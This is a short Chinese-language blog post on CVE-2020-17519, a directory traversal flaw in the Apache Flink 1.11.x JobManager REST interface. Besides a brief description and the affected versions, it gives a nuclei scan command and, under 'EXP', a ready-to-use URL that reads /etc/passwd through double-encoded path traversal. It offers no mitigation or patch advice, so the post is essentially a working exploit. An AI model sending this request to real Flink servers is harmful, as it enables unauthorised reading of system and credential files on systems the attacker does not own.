Apache-Flink-jobmanager 目录遍历（CVE-2020-17519）

7月17日发布

050

## 漏洞概述
Apache Flink 1.11.0中引入的一个更改，允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。

## 影响范围
“`http
Apache Flink 1.11.0
Apache Flink 1.11.1
Apache Flink 1.11.2
“`

## POC
“`bash
nuclei.exe -tags apache -t cves/ -stats -u http://test.com:8081
“`

## EXP

“`http
http://your-ip:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
“`

## 参考链接

[CVE-2020-17519 & CVE-2020-17518 分析](https://xz.aliyun.com/t/8993?page=1)

文章版权归作者所有，未经允许请勿转载。

THE END

喜欢就支持一下吧

请登录后查看评论内容

1新增沉浸式翻译插件deepl pro api共享